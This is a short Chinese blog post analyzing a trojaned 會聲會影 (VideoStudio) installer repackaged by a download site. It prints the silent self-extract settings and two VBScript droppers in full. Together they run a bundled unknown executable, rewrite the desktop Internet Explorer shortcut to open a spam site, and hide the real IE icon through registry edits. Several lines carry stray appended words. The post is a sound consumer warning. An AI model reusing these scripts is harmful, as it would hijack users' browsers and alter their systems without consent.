簡單***分析

時間 2020-08-07

標籤簡單分析简体版

原文原文鏈接

須要使用會聲會影編輯一點視頻，搜到了會聲會影 V12.0.0157.0 官方簡體中文特別版，「起點下載」提供，在 http:// cncrk.com/downinfo/1648.html，可是有***，看看其手段如何：html

一、下載的爲rar文件，展開後有一個UVS12.exe文件。shell

二、雙擊運行UVS12.exe，這是一個7zip壓縮文件，展開壓縮文件後自動運行a.vbs，你中招了。ide

7zip自動運行文件內容：網站

－－－－－－－－－－視頻

;下面的註釋包含自解壓腳本命令htm

Setup=a.vbsip

Silent=1ci

Overwrite=1get

－－－－－－－－－－cmd

三、UVS12.exe內包含文件有：

360se.exe

a.vbs

b.vbs

o.ico

dx.exe

其中360se.exe是***，a.vbs和b.vbs是***植入程序；

o.ico是圖標，dx.exe纔是真正的會聲會影程序。

四、a.vbs內容：

－－－－－－－－－－－

DIM objShell

set objShell=Wscript.createObject("wscript.shell")

iReturn=objShell.Run("cmd.exe /C start dx.exe",0,TRUE)

iReturn=objShell.Run("cmd.exe /C start 360SE.exe",0,TRUE)

iReturn=objShell.Run("cmd.exe /C start b.vbs",0,TRUE)

－－－－－－－－－－－

大意是先執行會聲會影安裝，再安裝***360se.exe，再執行b.vbs。

五、b.vbs內容：

－－－－－－－－－－－

On Error Resume Next

Set Wshshell=CreateObject("Wscript.Shell")

strLinkFile=WshShell.SpecialFolders("desktop")&"\Internet Explorer.*"

Wshshell.Run "cmd /c attrib -s -h -r "&chr(34)&strLinkFile&chr(34),0,1

Wshshell.Run "cmd /c del /f/a/q "&chr(34)&strLinkFile&chr(34),0,1

strLinkFile=WshShell.SpecialFolders("desktop")&"\Internet Explorer.lnk"

Set lnk=WshShell.CreateShortcut(strLinkFile)

lnk.TargetPath =Chr(34)&"C:\Program Files\Internet Explorer\IEXPLORE.EXE"&Chr(34)

lnk.Arguments="http://www.4442.cc"

lnk.Description = " "

lnk.Save

Wshshell.Run "cmd /c attrib +r "&chr(34)&strLinkFile&chr(34),0,1

Wshshell.Run "cmd /C reg add "&chr(34)&"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel"&chr(34)&" /v {871C5380-42A0-1069-A2EA-08002B30309D} /t REG_DWORD /d 1 /F",0,1

Wshshell.Run "cmd /C reg add "&chr(34)&"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu"&chr(34)&" /v {871C5380-42A0-1069-A2EA-08002B30309D} /t REG_DWORD /d 1 /F",0,1

strDesktop = WSHShell.SpecialFolders("Desktop")

WSHShell.AppActivate strDesktop

WSHShell.SendKeys "{F5}"

－－－－－－－－－－－－

大意是：

爲垃圾網站4422創建C:\Program Files\Internet Explorer\IEXPLORE.EXE快捷方式參數，並修改註冊表中IE快捷方式參數，也就是顯示在桌面上的那個IE圖標，最後刷新桌面顯示。

六、dx.exe也是個7zip文件，來自於greendown.cn。

估計是「起點下載」從greendown.cn下載後從新打包後發佈的。

提示一下，下載熱門的東西，如各種xxx門的同窗應該留意下了，從上面就能夠看出垃圾網站起點下載植入***的手段。